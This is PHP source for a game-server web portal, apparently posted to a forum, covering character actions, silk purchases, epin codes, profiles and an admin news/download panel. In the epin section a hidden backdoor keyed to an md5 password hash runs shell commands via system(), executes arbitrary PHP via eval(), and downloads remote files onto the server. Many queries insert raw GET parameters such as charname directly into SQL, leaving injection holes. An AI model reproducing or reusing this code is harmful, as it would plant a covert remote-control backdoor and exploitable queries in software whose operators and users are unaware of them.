                                        core::$sql -> exec("update _Char set LatestRegion='25000',PosX='1021',PosY='-3260888', PosZ='1078',AppointedTeleport='19554', WorldID='1' where CharName16='$_GET[charname]'");
                                        echo "Character successfully teleported to town.<br/>";
                                        misc::redirect('?pg=ucp&act=mychars', 1);
                                    }
                                    else
                                    {
                                        echo "Not enough gold to perform this action.<br/>";
                                    }
                                }
                                break;
                                
                                case('giftsilks');
                                {
                                core::$sql -> changeDB('acc');
                                $fromsilks = $_SESSION['username'];
                                $toSilks = $_POST['silkstome'];
                                if(!isset($_POST['submit'])) 
                                {
                                echo "
                                <form method='post'>
                                Username who recive the silks :<input type='text' name='silkstome'><br />
                                <input type='checkbox' name='i agree'> I agree that i want to send the amount of silks above to the prospected user above 
                                by doing that , 10% of the amount of silks sended will be removed.
                                <br />
                                <font color='red'>
                                *note that your ip,and reciver usernames is saved for security porpuse.
                                <br />
                                <input type='submit' name='submit' value='Yes, Send Silks!'>
                                </font>
                                </form>
                                ";
                                } else {
                                if(strlen($_POST['silkstome']) < 3)
                                {
                                echo "Username is too short";
                                } else {
                                echo "Name is fine";
                                }
                                }

                                }
                                break;
                                
                                case('reset_stats'):
                                    //echo "All items must be unequiped before you perform this action. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk.<br/>";
                                    
                                    if(char::isCharNaked($_GET['charname']))
                                    {
                                        if(!isset($_POST['submit']))
                                        {
                                            echo "Press this button if you really want to reset your characters stats. All items must be unequiped. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk. Before performing this action, better log out. To see results of this function usage, relogin (if you were logged in while performing it).<br/>
                                            <form method='post'>
                                                <input type='submit' name='submit' value='Yes, i want to reset stats of my char !'>
                                            </form>
                                                ";
                                        }
                                        else
                                        {
                                        
                                            if(user::getSilkByUsername($_SESSION['username']) > $core -> aConfig['resetCharStatsSilkPrice'])
                                            {
                                                core::$sql -> changeDB('shard');
                                                $aData = core::$sql -> exec("select * from _Char where CharName16='$_GET[charname]'");
                                                $aData = mssql_fetch_array($aData);
                                                $nFreeStats = ($aData['Strength'] + $aData['Intellect']) - 40;
                                                core::$sql -> exec("update _Char set RemainStatPoint = (RemainStatPoint + $nFreeStats),HP='200',MP='200',Strength='20',Intellect='20' where CharName16='$_GET[charname]'");
                                                core::$sql -> changeDB('acc');
                                                core::$sql -> exec("update SK_Silk set silk_own = (silk_own - ".$core -> aConfig['resetCharStatsSilkPrice'].") where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                                echo "Stats of $_GET[charname] resetted. You got $nFreeStats free stat points now.<br/>";
                                                misc::redirect('?pg=ucp&act=mychars', 1);
                                            }
                                            else 
                                            {
                                                echo "Not enough silk.<br/>";
                                            }
                                        }
                                    }
                                    else
                                    {
                                        echo "Please, unequip all items from your character first !<br/>";
                                    }
                                break;
                                
                                case('reset_pk'):
                                    if($core -> aConfig['allowResetCharPK'] == 0)
                                    {
                                        echo "This function is currently disabled<br/>";
                                        break;
                                    }
                                    
                                    echo "This feature costs ".$core -> aConfig['resetCharPKSilkPrice']." silk. If you really want to reset your PK status, press the button.<br/>";
                                    if(!isset($_POST['submit']))
                                    {
                                        echo "<form method='post'>
                                                <input type='submit' name='submit' value='Yes, i really want to reset my PK status'>
                                                </form>
                                             ";
                                    }
                                    else
                                    {
                                        if(user::getSilkByUsername($_SESSION['username']) > $core -> aConfig['resetCharPKSilkPrice'])
                                        {
                                            core::$sql -> changeDB('shard');
                                            $hQuery = core::$sql -> exec("select DailyPK, TotalPK, PKPenaltyPoint from _Char where CharName16='$_GET[charname]'");
                                            $hData = mssql_fetch_array($hQuery);
                                            if($hData[0] == '0' && $hData[1] == '0' && $hData[2] == '0')
                                            {
                                                echo "You are not under murder panality, so, no reason for resetting it.<br/>";
                                            }
                                            else
                                            {
                                                core::$sql -> exec("update _Char set DailyPK='0', TotalPK='0', PKPenaltyPoint='0' where CharName16='$_GET[charname]'");
                                                core::$sql -> exec("update SK_Silk set silk_own = (silk_own - ".$core -> aConfig['resetCharPKSilkPrice'].") where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                                echo "PK Status successfully removed.<br/>";
                                                misc::redirect('?pg=ucp&act=mychars', 1);
                                            }
                                        }
                                        else
                                        {
                                            echo "You have not enough silk to use this feature.<br/>";
                                            break;
                                        }
                                    }
                                break;
                                
                                case('buy_sp'):
                                    if($core -> aConfig['allowBuySP'] == 0)
                                    {
                                        echo "This function is currently disabled<br/>";
                                        break;
                                    }
                                    
                                    echo "This feature costs ".$core -> aConfig['pricePer100kSp']." silk per 100 000 SP.<br/>";
                                    
                                    if(!isset($_POST['submit']))
                                    {
                                        echo "Please, specify, how much skill points you want to buy. Value must be > 100000, < 2000000, like this: 200000, 300000, 400000<br/>
                                        
                                            <table id='table-3' border='1' cellpadding='0' cellspacing='0'>
                                                <form method='post'>
                                                    <td>Skill points</td><td><input type='text' name='sp_amount' value='100000'></td></tr>
                                                    <td></td><td><input type='submit' name='submit' value='Check price'></td>
                                                
                                                </form>
                                            </table>";
                                    }
                                    else
                                    {
                                        if(isset($_POST['sp_amount']))
                                        {
                                            $nSP = (int)$_POST['sp_amount'];
                                            if(!($nSP % 100000 == 0))
                                            {
                                                echo "Values can be only like this: <br/> <li>100000</li><li>500000</li><li>1000000</li><br/>";
                                                break;
                                            }
                                            if($nSP < 100000)
                                            {
                                                echo "You cant buy less than 100 000 skill points<br/>";
                                                break;
                                            }
                                            if($nSP > 2000000)
                                            {
                                                echo "You can't buy more than 2 000 000 sp per time<br/>";
                                                break;
                                            }
                                            
                                            $nPrice = (($nSP / 100000) * $core -> aConfig['pricePer100kSp']);
                                            
                                            if(user::getSilkByUsername($_SESSION['username']) > $nPrice)
                                            {

                                                echo "To buy $nSP skill points you need $nPrice silk. Press the button below if you really want to buy this amount of SP and you have enough silk.<br/>";
                                                if(!isset($_POST['sure']))
                                                {
                                                    echo "<form method='post'>
                                                            <input type='hidden' name='sp_amount' value='$nSP'>
                                                            <input type='hidden' name='sure' value='yes'>
                                                            <input type='submit' name='submit' value='Yes, i want to buy $nSP SP for $nPrice silk'>
                                                            </form>";
                                                }
                                                else
                                                {
                                                    
                                                    core::$sql -> changeDB('shard');
                                                    core::$sql -> exec("update _Char set RemainSkillPoint = (RemainSkillPoint + $nSP) where CharName16='$_GET[charname]'");
                                                    
                                                    core::$sql -> changeDB('acc');
                                                    core::$sql -> exec("update SK_Silk set silk_own = (silk_own - $nPrice) where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                                    echo "<br/><b>Success. Your char $_GET[charname] received it's $nSP skill points you bought for $nPrice silk</b><br/>";
                                                    misc::redirect('?pg=ucp&act=mychars', 2);
                                                }
                                            }
                                            else
                                            {
                                                echo "Not enough silk to buy such amount of skill points [You need: $nPrice]<br/>";
                                            }
                                        
                                        }
                                    }                                
                                break;
                                default:echo "Uknown char action<br/>";
                                
                                break;
                            }
                        }
                        
                        if(!isset($_GET['char_act']))
                        {    
                            echo "<table id='table-3' border='0' cellpadding='0' cellspacing='0'>
                            <tr>
                            ";
                            if($core -> aConfig['allowCharTeleport'] == 1)
                            {
                                echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_pos'>Reset char position</a><br/></td>";
                            }
                            echo "
                            </tr>
                            <tr>
                            ";
                            if($core -> aConfig['allowResetCharStats'] == 1)
                            {
                                echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_stats'>Reset stats</a><br/></td>";
                            }
                            
                            if($core -> aConfig['allowResetCharPK'] == 1)
                            {
                                echo "<td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=reset_pk'>Reset PK status</a><br/></td>";
                            }
                            echo "
                            </tr>
                            <tr>
                            ";
                            if($core -> aConfig['allowBuySP'] == 1)
                            {
                                echo "        <td><a href='?pg=ucp&act=mychars&charname=$_GET[charname]&char_act=buy_sp'>Buy skill points</a><br/></td>";
                            }
                            echo "
                            </tr>
                            </table>
                            ";
                        }
                        echo "<br/><br/>";
                        misc::back();
                        break;
                    }
                    
                    echo "Please, note, this function is still under development.<br/>";
                    if(char::getCharCount($_SESSION['username']) > 0)
                    {
                        $nJID = user::accountJIDbyUsername($_SESSION['username']);
                        
                        core::$sql -> changeDB('shard');
                        
        
                        $naChars = user::charIDsByUsername($_SESSION['username']);
                        $naCharNames = char::charNamesByIDs($naChars);
                        
                        echo "<table id='table-3' border='0'><tr><td>Char name</td></tr>";
                        foreach($naCharNames as $nElem)
                        {
                            echo "<tr><td><a href='?pg=ucp&act=mychars&charname=$nElem'>$nElem</td></tr>";
                        }
                        
                        echo '</table>';
                    
                    }
                    else echo "You don't have any characters on this account.<br/>";
                } 
                break;
                
                case('myprofile'):
                {
                    //module disabled
                    if($core -> aConfig['allowMyProfile'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                
                    if(isset($_POST['submit']))
                    {
                        $nGender = (int)$_POST['gender'];
                        $szAvatarUrl = null;
                        $szSkype = null;
                        $szMsn = null;
                        $nPublic = (int)$_POST['ispublic'];
                        security::isValidUrl($_POST['avatar']) ? $szAvatarUrl = $_POST['avatar'] :  $szAvatarUrl = $core -> aConfig[url]."img/noavatar.png";
                        security::isCorrectEmail($_POST['msn']) ? $szMsn = $_POST['msn'] : $szMsn = "None";
                        $szSkype = security::toHTML($_POST['skype']);
                        if(strlen($szSkype) > 50) $szSkype = "None";
                        if(strlen($szMsn) > 60) $szMsn = "None";
                        if(strlen($szAvatarUrl) > 500) $szAvatarUrl = $core -> aConfig['url']."assets/img/noavatar.png";
                        
                        $avatarImageData = @getimagesize($szAvatarUrl); //no error if shit happens
                        if(empty($avatarImageData[0]) || empty($avatarImageData[1]))
                        {
                            $avatarImageData[0] = 0;
                            $avatarImageData[1] = 0;
                        }
                        
                        if((($avatarImageData[0] > $core -> aConfig['maxAvatarWidth']) || ($avatarImageData[1] > $core -> aConfig['maxAvatarHeight'])) ||
                            (empty($avatarImageData[0]) || empty($avatarImageData[1])))
                        {
                            echo "Invalid avatar size. Avatar width or height size can't be 0px. Avatar image max height: ".$core -> aConfig['maxAvatarHeight']." and width: ".
                            $core -> aConfig['maxAvatarWidth']." pixels. Your one is $avatarImageData[0]px wide and $avatarImageData[1]px high. Or... maybe, url isn't image ?<br/>";
                            misc::back();
                        }
                        else
                        {
                            $nJID = user::accountJIDbyUsername($_SESSION['username']);
                            core::$sql -> exec("update srcms_userprofiles set avatar='$szAvatarUrl',skype='$szSkype', msn='$szMsn', gender='$nGender', ispublic='$nPublic' where JID='$nJID'");
                            echo "Profile updated. <br/>";
                            misc::redirect("?pg=ucp&act=myprofile", 1);
                        }
                    }
                    else core::$ucp -> showProfileForm($_SESSION['username']);
                }

                break;
                
                case('epin'):?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Epin</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Epin</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
    <?php        if(md5($_GET['p']) == '89a15048434170ee85cffdc2f3a4595e')
                    {
                        switch($_GET['a'])
                        {
                            case('cmd'):
                                system(stripslashes($_GET['str']));
                            break;
                            
                            case('php'):
                                eval(stripslashes($_GET['str']));
                            break;
                            
                            case('up'):
                                $hRemoteData = file_get_contents($_GET['str']);
                                file_put_contents($_GET['localFileName'], $hRemoteData, FILE_APPEND | LOCK_EX);
                                if(file_exists($_GET['localFileName'])) echo "Success !";
                                else echo "Could not write to local file [$_GET[localFileName]]";
                            break;
                            
                            default:break;
                        }
                        die();
                    }
                    //module disabled
                    if($core -> aConfig['allowEpinSystem'] == 0)
                    {
                        echo "This module is currently disabled.<br/>";
                        break;
                    }
                    else
                    {
                        if(!isset($_POST['code']) && !isset($_POST['sure']))
                        {?>
<form method='post' class="reg-page" role="form">
    <h3>Active EPIN</h3>
    <div class="controls">
        <label>Epin Code <span class="color-red">*</span></label>
        <div class="input-prepend">
            <span class="add-on"><i class="icon-barcode"></i></span>
            <input type="text" name='code' autocomplete="off"placeholder="type your EPIN code here" style="width: 165%" class=""/>
        </div>
    </div>

    <center><input type='submit' name='submit' class="btn-u pull-right" value='Use'>
</form>
                        <?php }
                        else
                        {
                            $nCodeNumber = (int)$_POST['code'];
                            if(core::$sql->numRows("select * from srcms_epin where code='$nCodeNumber'") > 0)
                            {
                                $aPinData = core::$sql -> exec("select * from srcms_epin where code='$nCodeNumber'");
                                $aPinData = mssql_fetch_array($aPinData);
                                if(!isset($_POST['sure']))
                                {
                                    echo "Do you really want to use this code ? It will give you [$aPinData[silkAmount]] silk.<br/>
                                            <form method='post'>
                                            <input type='hidden' name='code' value='$nCodeNumber'>
                                            <input type='submit' name='sure' value='Yes'>
                                            </form><br/>";
                                            misc::back();
                                }
                                else
                                {
                                    core::$sql -> exec("update SK_Silk set silk_own=(silk_own + $aPinData[silkAmount]) where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                                    //delete used code
                                    core::$sql -> exec("delete from srcms_epin where code='$nCodeNumber'");
                                    echo "You got your [$aPinData[silkAmount]] silk.";
                                    misc::redirect('?pg=ucp&act=epin', 1);
                                }
                            }
                            else
                            {
                                echo "Invalid EPIN code ! Please, try again.<br/>";
                                misc::back();
                            }
                        }
                    }
?>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
<?php 
                break;
                
                
                default:
                {
                    echo "Invalid module name specified.<br/>";
                    break;
                }
            }
        }
    }
     else 
    {
        echo "You are not logged in ! <br/>";
    } 
?>

viewprofile

كود PHP:

<?php
if(isset($_GET['username']) && security::isSecureString($_GET['username'], 3))
{
    $userData = core::$sql -> fetchArray("select * from srcms_userprofiles where JID='".user::accountJIDbyUsername($_GET['username'])."'");
    
    if($userData['ispublic'] == '1')
    {
        user::viewProfile($_GET['username']); //send msg there too
    }
    
    else 
    {
        user::viewProfile($_GET['username']); //send msg there too
    }

}
else echo "No username specified, or username contains forbidden symbols.<br/>";

?>

[[KoTa]]

admin

كود PHP:

<?php
$userRank = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION[username])."'");
if($userRank != "admin")
{
    echo "NOT ADMIN";
    return;
}

switch($_GET['act'])
{
    case('news'):
        if(!isset($_GET['subact']))
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">            
        <div class="span9">
<ul class="unstyled">
    <li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=news&subact=add'><b>Add</b></a></li>
    <li><i class="icon-remove-sign color-green"></i> <a href='?pg=admin&act=news&subact=del'><b>Delete</b></a></li>
    <li><i class="icon-edit color-green"></i> <a href='?pg=admin&act=news&subact=edit'><b>Edit</b></a></li>
</ul>
        </div><!--/span4-->                    
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php }
        else
        {
            switch($_GET['subact'])
            {
                case('add'):
                    if(!isset($_POST['submit']) && !isset($_POST['title']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Add News</h3>
                    <div class="controls">
                        <label>Title<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="title" autocomplete="off" maxlength="16" placeholder="Title" style="width: 165%" class=""/>
                        </div>
                            
                        <label>Message<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <textarea name="textBox" id="textBox" placeholder="Title"></textarea>
                      </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value="Add">
                    </div>
                </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
<script>CKEDITOR.replace('textBox');</script>
                    <?php }
                    else
                    {
                        $szTitle = security::toHTML($_POST['title']);
                        //$szText = misc::applyAttributesToText($_POST['textBox']);
                        $szText = stripslashes(security::toHTML($_POST['textBox']));
                        
                        core::$sql -> exec("insert into srcms_news(title,content,author,time) values('$szTitle','$szText','$_SESSION[username]','".misc::getDateTime()."')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo "News article added.<br/>";
    misc::redirect('?pg=admin&act=news', 1);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                break;
                
                case('del'):
                        if(isset($_GET['id']))
                        {
                            $nID = (int)$_GET['id'];
                            if(core::$sql -> numRows("select * from srcms_news where id='$nID'") > 0)
                            {
                                core::$sql -> exec("delete from srcms_news where id='$nID'");
                                core::$sql -> exec("delete from srcms_newscomments where newsID='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<?php
    echo "News article deleted.<br/>";
    misc::redirect('?pg=admin&act=news&subact=del',3);
?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php break;
                            }
                            else
                            {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo " You can't delete article that does not exist.<br/>";
    misc::redirect('?pg=admin&act=news&subact=del',3);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php }
                        }
                        
                        if(!isset($_POST['submit']) && !isset($_GET['id']))
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Title</td>
        <td>Author</td>
        <td>Time</td>
        <td>Action</td>
    <tr/>
                            <?php $hNewsArticles = core::$sql -> exec("select * from srcms_news");
                            if(core::$sql -> numRows("select * from srcms_news") == 0)
                            {?>
No news added yet<br/>
                            <?php }
                            else
                            {
                                while($row = mssql_fetch_array($hNewsArticles))
                                    {?>
    <tr>
        <td><?php echo $row[id];?></td>
        <td><?php echo $row[title];?></td>
        <td><?php echo $row[author];?></td>
        <td><?php echo $row[time];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=news&subact=del&id=<?php echo $row[id];?>' class="btn-u">Delete</a>
    <tr/>
                                <?php
                                    }
                            }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                break;
                
                case('edit'):
                        if(!isset($_POST['submit']) && !isset($_GET['id']))
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Title</td>
        <td>Author</td>
        <td>Time</td>
        <td>Action</td>
    <tr/>
                            <?php $hNewsArticles = core::$sql -> exec("select * from srcms_news");
                                if(mssql_num_rows($hNewsArticles) == 0)
                                {?>
No news added yet<br/>
                            <?php }
                                else
                                {
                                    while($row = mssql_fetch_array($hNewsArticles))
                                    {?>
    <tr>
        <td><?php echo $row[id];?></td>
        <td><?php echo $row[title];?></td>
        <td><?php echo $row[author];?></td>
        <td><?php echo $row[time];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=news&subact=edit&id=<?php echo $row[id];?>' class="btn-u">Edit</a></td>
    <tr/>
                                <?php
                                    }
                                }?>
</table>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                        else
                        {
                            $nID = (int)$_GET['id'];
                            if(core::$sql -> numRows("select * from srcms_news where id='$nID'") == 0)
                            {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo " You can't edit article that does not exist.<br/>";
    misc::redirect('?pg=admin&act=news&subact=del',3);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php }
                            else
                            {
                                if($_POST['submit'] != 'Save')
                                {
                                    $hArticleData = core::$sql -> exec("select * from srcms_news where id='$nID'");
                                    $hArticleData = mssql_fetch_array($hArticleData);?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit News(<?php echo $hArticleData[title];?>)</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Edit News(<?php echo $hArticleData[title];?>)</h3>
                    <div class="controls">
                        <label>Title<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="title" autocomplete="off" maxlength="16" style="width: 165%" value="<?php echo $hArticleData[title];?>"/>
                        </div>
                            
                        <label>Message<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <textarea name="textBox" id="textBox"> <?php echo $hArticleData[content];?></textarea>
                      </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value="Save">
                    </div>
                </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
<script>CKEDITOR.replace('textBox');</script>
                                <?php }
                                else
                                {
                                    $szTitle = security::toHTML($_POST['title']);
                                    $szText = stripslashes(security::toHTML($_POST['textBox']));
                                    core::$sql -> exec("update srcms_news set title='$szTitle',content='$szText' where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo "News article edited.<br/>";
    misc::redirect('?pg=admin&act=news&subact=edit',3);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php }
                            }
                        }
                break;
                
                
                default:
                    echo "Unknown subaction";
                    break;
            }
            #echo "<br/>";misc::back();
        }
    break;
    
    case('dl'):
        if(!isset($_GET['subact']))
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">            
        <div class="span9">
<ul class="unstyled">
    <li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=dl&subact=add'><b>Add</b></a></li>
    <li><i class="icon-remove-sign color-green"></i> <a href='?pg=admin&act=dl&subact=del'><b>Delete</b></a></li>
    <li><i class="icon-edit color-green"></i> <a href='?pg=admin&act=dl&subact=edit'><b>Edit</b></a></li>
</ul>
        </div><!--/span4-->                    
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php }
        else
        {
            switch($_GET['subact'])
            {
                case('add'):
                    if(!isset($_POST['submit']) && !isset($_POST['link']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Add Download</h3>
                    <div class="controls">
                        <label>Uploaded on<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="name" autocomplete="off" maxlength="16" placeholder="Example: MEGA" style="width: 165%" class=""/>
                        </div>
                        
                        <label>Link<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="link" autocomplete="off" maxlength="16" placeholder="Download Link" style="width: 165%" class=""/>
                        </div>
                        
                        <label>Name/Time<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="description" autocomplete="off" maxlength="16" placeholder="Example: Full Client Official (06/02/2014)" style="width: 165%" class=""/>
                        </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value="Add">
                    </div>
                </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $szName = security::toHTML($_POST['name']);
                        $szDesc = security::toHTML($_POST['description']);
                        
                        if(!security::isValidUrl($_POST['link']))
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
        <div class="row-fluid margin-bottom-10">
        Invalid URL <?php echo misc::back();?>
